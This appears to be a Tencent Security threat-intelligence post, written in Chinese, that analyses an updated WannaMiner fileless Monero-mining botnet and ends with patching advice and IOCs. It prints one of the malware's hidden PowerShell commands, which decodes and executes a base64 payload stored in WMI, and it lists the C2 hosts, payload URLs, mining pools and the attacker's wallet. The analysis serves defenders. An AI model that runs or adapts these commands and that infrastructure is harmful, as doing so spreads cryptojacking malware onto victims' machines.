产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
一站式等保服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
- NEW最新动态
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云
- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录
WannaMiner挖矿木马更新基础设施 新手法已大赚17万元
2019-04-16 10:14:19
一、概述
WannaMine采用“无文件”攻击组成挖矿僵尸网络,最早在2017年底被发现,攻击时执行远程Powershell代码,全程无文件落地。为了隐藏其恶意行为,WannaMine还会通过WMI类属性存储shellcode, 并使用“永恒之蓝”漏洞攻击武器以及“Mimikatz+WMIExec”攻击组件进行横向渗透。
近期腾讯安全御见威胁情报中心检测到该挖矿僵尸网络更新了基础设施,启用了新的C2地址存放恶意代码,并且通过Powershell内存注入挖矿和释放PE木马挖矿两种形式来增大挖矿程序执行成功概率。WannaMiner挖矿木马升级后,已赚取收益402枚门罗币(折合人民币17.5万元)。
WannaMine变种攻击流程
WannaMiner挖矿木马本次升级的主要特点:
1. 升级病毒基础设施(C2服务器地址、更新后的Payload下载地址、矿池和钱包地址);
2. 检查进程中是否存在其他挖矿木马,如果存在,就先结束进程,以独占系统资源挖矿;
3. PowerShell进程中注入执行矿机,若失败就释放PE文件(用被发现的风险换取执行机会),继续执行挖矿;
4. 病毒会扫描局域网内其他电脑是否开放139、445端口,如果开放,就利用永恒之蓝漏洞在局域网内攻击传播。
二、详细分析
攻击时判断profetestruec.net、45.199.154.108、172.247.116.87是否能连接成功,若能连接成功则使用其替换旧地址172.247.116.8,通过WMI命令判断受害计算机属于32位还是64位系统,使用更新后的地址拼接完整URL下载Payload ,64位执行in6.ps1,32位执行in3.ps1
Powershell中包含一大段通过base64编码和混淆的文本$fa
解码文本并读入内存,通过不同的长度定位分割得到五个参数:
$mimi(PowerShell Mimikatz)、$mon(挖矿代码)、$funs(核心命令)、$mons(挖矿文件)、$sc(持久化)
注册WMI类root\default:systemcore_Updater3并将之前得到的参数添加到其属性中,另外准备参数“ipsu”、“i17”供后续使用
查找进程名包含powershell或schtasks,该进程包含使用端口为80或14444的tcp网络连接,认为挖矿程序已经在执行中,不再继续执行之后的代码;
针对每一个进程检查是否存在3333、5555、7777端口的tcp连接,若有则认为其为竞争对手的挖矿进程,并杀死该进程
获取WMI中的属性$mon、$funs,解码$funs作为命令,$mon作为参数传入执行,以达到在Powershell进程中注入执行矿机:
powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:systemcore_Updater3').Properties['mon'].Value;`$funs = ([WmiClass] 'root\default:systemcore_Updater3').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`"
若该方法启动挖矿失败,则将挖矿程序mons写入文件
C:\Windows\System32\mue.exe,并通过WMI启动挖矿进程
释放的挖矿木马mue.exe运行时注入系统进程schtask.exe(计划任务管理器)
该挖矿程序使用开源矿机程序XMRig编译,版本为2.14.1
挖矿时使用矿池:
stratum+tcp://xmr-eu1.nanopool.org:14444
stratum+tcp://xmr-eu2.nanopool.org:14444
stratum+tcp://xmr-us-east1.nanopool.org:14444
stratum+tcp://xmr-us-west1.nanopool.org:14444
stratum+tcp://xmr-asia1.nanopool.org:14444
stratum+tcp://pool.supportxmr.com:80
stratum+tcp://mine.xmrpool.net:80
使用钱包:
49WZduVQ1DFWG3scZxFT8hBY1JsoYuJVqMRe8UAiYzc2WmGbN7yFDmmc2GZzrAv6GkY24hR7imhNaWME9wEKWPGF3h2FXQB
查询钱包收益,在矿池nanopool.org中获得收益389.51个XMR,在矿池xmrpool.net中获得收益13个XMR,共挖矿获得402.51个门罗币,当前价格折合人民币175611.28元
安装WMI事件过滤器,将脚本配置为消费者,并绑定消费者和事件过滤器,当WMI内部事件发生时触发脚本代码执行,以达到恶意代码持续化
调用“$ Networks = Get-WmiObject Win32_NetworkAdapterConfiguration”以获取网络适配器配置中所有IP地址的列表,对于网络配置中的每个IP地址,计算同一子网中计算机的IP地址,调用命令“netstat -anop TCP”检查连接状态,若具有“ESTABLISHED”连接状态且不是本地回连,则将其作为攻击目标并扫描IP地址,判断是否易受攻击(开放445/139端口),若开放端口则进行永恒之蓝漏洞攻击,将攻击过的IP保存至($i17)
NSA武器库泄露以后被黑客组织广泛使用,其中的“永恒之蓝”漏洞攻击工具在2017年5月和6月分别用于传播勒索病毒WannaCry及NotPetya,给全球范围内的互联网基础设施造成灾难性的损失。
该工具后来又被黑客用于传播挖矿木马,通过漏洞快速扩散挖矿程序,挖掘数字加密货币牟利。而修复该漏洞的方法早已被公布,也就是微软在2017年3月发布的补丁MS17-010,但是时至今日仍有不少企业未及时修复和升级系统,以至于黑客简单地使用这个方法仍能攻击成功。
三、安全建议
1、安装永恒之蓝漏洞补丁,手动下载请访问以下页面:
https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx
其中WinXP,Windows Server 2003用户请访问:
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598
也可通过腾讯御点终端安全管理系统修补漏洞
2、尽量关闭不必要的端口,如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的IP连接登陆。
3、对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。
4、对重要文件和数据(数据库等数据)进行定期非本地备份。
5、在终端/服务器部署专业安全防护软件拦截病毒,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务。
IOCs
Md5
b53205b72c2918aa6336ef1bf1ef2606
8325f59766ceb290e17c443d1543b20d
da15885ee487e9b267004ba356a89f65
090c8010a02cdda1a52b1866fc9ebd05
Domain
profetestruec.net
IP
172.247.116.87
172.247.116.8
45.199.154.108
URL
hxxp://172.247.116.87:8000/in3.ps1
hxxp://172.247.116.87:8000/in6.ps1
hxxp://172.247.116.87:8000/banner
hxxp://172.247.116.87:8000/info.vbs
hxxp://172.247.116.87:8000/ze3.ps1
hxxp://172.247.116.87:8000/ze6.ps1
hxxp://profetestruec.net:8000/in3.ps1
hxxp://profetestruec.net:8000/in6.ps1
hxxp://profetestruec.net:8000/banner
hxxp://profetestruec.net:8000/info.vbs
hxxp://profetestruec.net:8000/ze3.ps1
hxxp://profetestruec.net:8000/ze6.ps1
hxxp://172.247.116.8:8000/in3.ps1
hxxp://172.247.116.8:8000/in6.ps1
hxxp://172.247.116.8:8000/banner
hxxp://172.247.116.8:8000/info.vbs
hxxp://172.247.116.8:8000/ze3.ps1
hxxp://172.247.116.8:8000/ze6.ps1
hxxp://45.199.154.108:8000/banner
hxxp://45.199.154.108:8000/in6.ps1
hxxp://45.199.154.108:8000/info.vbs
钱包:
49WZduVQ1DFWG3scZxFT8hBY1JsoYuJVqMRe8UAiYzc2WmGbN7yFDmmc2GZzrAv6GkY24hR7imhNaWME9wEKWPGF3h2FXQB
矿池:
stratum+tcp://xmr-eu1.nanopool.org:14444
stratum+tcp://xmr-eu2.nanopool.org:14444
stratum+tcp://xmr-us-east1.nanopool.org:14444
stratum+tcp://xmr-us-west1.nanopool.org:14444
stratum+tcp://xmr-asia1.nanopool.org:14444
stratum+tcp://pool.supportxmr.com:80
stratum+tcp://mine.xmrpool.net:80
参考链接
《Fileless Monero WannaMine, a new attack discovered by PandaLabs》
https://www.pandasecurity.com/mediacenter/pandalabs/threat-hunting-fileless-attacks/
《WannMine – Lateral Movement Techniques》
https://www.acalvio.com/wannmine-lateral-movement-techniques/
《Wannamine cryptominer that uses eternalblue still active》
https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry
《WannaMine再升级》
https://www.freebuf.com/articles/web/175626.html
在线咨询
方案定制